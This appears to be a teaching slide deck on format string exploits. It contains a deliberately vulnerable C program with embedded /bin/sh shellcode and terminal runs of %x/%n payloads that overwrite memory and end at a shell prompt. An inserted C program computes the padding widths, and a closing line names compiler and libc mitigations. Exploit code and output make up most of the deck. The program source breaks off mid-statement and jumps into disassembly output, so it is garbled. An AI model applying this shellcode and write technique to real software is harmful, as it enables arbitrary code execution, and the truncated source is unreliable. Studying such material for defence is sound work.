Format string exploits
Case study
Emilio Mira
Example program
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char prompt[]="Hello world.";
char shellcode[]="\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
unsigned int num = 0;
int a, b, c, d;
void func(char *);
char str[] = "Hola";
void main(int argc, char *argv[])
{
char fstring[200];
int len;
if (argc != 2)
{
printf("don't forget the format string!\n");
exit(1);
}
len = strlen(argv[1]);
strncpy(fstring, argv[1], (len '
080a3074 <num>:
[emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%x
Num: 0
Inner funcAAAAt0
808f121bffff728804864c020415bffff818804828abffff74002c80a41c080a41c0c2c2b41414141.80a3074
Inner func
Num: 0
[emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n
Num: 0
Inner funcAAAAt0
808f121bffff728804864c020415bffff818804828abffff74002b80a41c080a41c0c2b2a41414141
Inner func
Num: 59
Modifying memory 2
[emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'AAAA$'\x74\x30\x0a\x08'AAAA$'\x74\x30\x0a\x08'AAAA\
$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%u%n
Num: 0
Inner funcAAAAt0
AAAAt0
AAAAt0
AAAAt0
808f121bffff718804864c020415bffff808804828abffff73004380a41c080a41c0c43421094795585
Inner func
Num: 73
[emilio@vega fstring]$ ./findaddr -115 0x12345678
Address: 0x12345678
Bytes written so far: 0x68/104
Total length: 0x234/564
Pad1: 0xf/15 Pad2: 0xde/222 Pad3: 0xde/222 Pad4: 0xde/222
[emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'AAAA$'\x75\x30\x0a\x08'AAAA$'\x76\x30\x0a\x08'AAAA\
$'\x77\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%15u%n%222u%n%222u%n%222u%n
Num: 0
Inner funcAAAAt0
AAAAu0
AAAAv0
AAAAw0
808f121bffff6f8804864c020415bffff7e8804828abffff71005a80a41c080a41c0c5a59 1094795585
1094795585
1094795585
1094795585
Inner func
Num: 12345678
[emilio@vega fstring]$
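As an added example (not the page's findaddr, whose source is not shown), this C program reproduces the width arithmetic behind the Pad1..Pad4 values above and replays the four %n stores to show how 0x12345678 is assembled one byte at a time; it assumes a counter of 105 characters before the first %u (the 32-byte address block plus 73 bytes of %x output, which is what the pads on this page imply, one more than findaddr's "bytes written so far" display). Called with 0x080a3040 it also gives the widths of the findaddr run on the shellcode address later in the deck.

```c
#include <stdint.h>
#include <stdio.h>

#define NWRITES 4   /* one %n per byte of the 32-bit value */
#define UDIGITS 10  /* "%u" of 0x41414141 prints 1094795585: 10 digits minimum */

/* Widths for four "%<w>u%n" pairs so the stores land the little-endian bytes
 * of `target` at addr, addr+1, addr+2, addr+3 (the page's Pad1..Pad4).
 * `written` is printf's character count just before the first %u. Only the
 * low byte of each store survives, since the next store overwrites the bytes
 * above it, so the counter only has to match each target byte modulo 256. */
void findaddr_pads(unsigned int written, uint32_t target, unsigned int pads[NWRITES]) {
    unsigned int count = written;
    for (int i = 0; i < NWRITES; i++) {
        unsigned int want = (target >> (8 * i)) & 0xff;
        unsigned int pad = (want - (count & 0xff)) & 0xff;
        if (pad < UDIGITS)   /* a width below the digit count prints nothing extra, */
            pad += 256;      /* so take the counter around one more time instead */
        pads[i] = pad;
        count += pad;
    }
}

/* Replay the counter over the four pairs, store the full 4-byte count at each
 * offset as %n does, and return the value left at mem[0..3]. counts[i] receives
 * the counter stored by the i-th %n (counts[2] is findaddr's "Total length"). */
uint32_t simulate_writes(unsigned int written, const unsigned int pads[NWRITES],
                         unsigned int counts[NWRITES]) {
    unsigned char mem[NWRITES + 3] = {0};  /* target plus 3 bytes of spill above it */
    unsigned int count = written;
    for (int i = 0; i < NWRITES; i++) {
        count += pads[i];
        counts[i] = count;
        for (int b = 0; b < 4; b++)        /* %n writes an int, not a single byte */
            mem[i + b] = (count >> (8 * b)) & 0xff;
    }
    return (uint32_t)mem[0] | (uint32_t)mem[1] << 8 |
           (uint32_t)mem[2] << 16 | (uint32_t)mem[3] << 24;
}

int main(void) {
    unsigned int pads[NWRITES], counts[NWRITES];
    findaddr_pads(105, 0x12345678u, pads);   /* counter of 105 assumed, see lead-in */
    uint32_t got = simulate_writes(105, pads, counts);
    printf("Pad: %u %u %u %u -> 0x%08x, third store at 0x%x\n",
           pads[0], pads[1], pads[2], pads[3], (unsigned)got, counts[2]);
    return 0;
}
```

GCC's -Wformat-security warns on printf(fstring) with a non-literal format, and glibc built with _FORTIFY_SOURCE=2 aborts when %n appears in a format string held in writable memory, which stops these stores before they happen.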
Format string exploit
[emilio@vega fstring]$ objdump -D fs1 | grep shellcode
080a3040 <shellcode>:
80a3040: eb 24 jmp 80a3066
80a3066: e8 d7 ff ff ff call 80a3042
[emilio@vega fstring]$ ./findaddr -115 0x080a3040
Address: 0x80a3040
Bytes written so far: 0x68/104
Total length: 0x30a/778
Pad1: 0xd7/215 Pad2: 0xf0/240 Pad3: 0xda/218 Pad4: 0xfe/254
[emilio@vega fstring]$ ./fs1 AAAA$'\xfc\xf6\xff\xbf'AAAA$'\xfd\xf6\xff\xbf'AAAA$'\xfe\xf6\xff\xbf'AAAA\
$'\xff\xf6\xff\xbf'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%215u%n%240u%n%218u%n%254u%n
Num: 0
Inner funcAAAA����AAAA����AAAA����AAAA����808f121bffff6f8804864c020415bffff7e8804828abffff71005b80a41c080a41c0c5b5a
1094795585
1094795585
1094795585
1094795585
Inner func
Num: 0
[emilio@vega fstring]$ ./fs1 AAAA$'\xec\xf7\xff\xbf'AAAA$'\xed\xf7\xff\xbf'AAAA$'\xee\xf7\xff\xbf'AAAA\
$'\xef\xf7\xff\xbf'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%215u%n%240u%n%218u%n%254u%n
Num: 0
Inner funcAAAA����AAAA����AAAA����AAAA����808f121bffff6f8804864c020415bffff7e8804828abffff71005b80a41c080a41c0c5b5a
1094795585
1094795585
1094795585
1094795585
Inner func
Num: 0
sh-2.05b$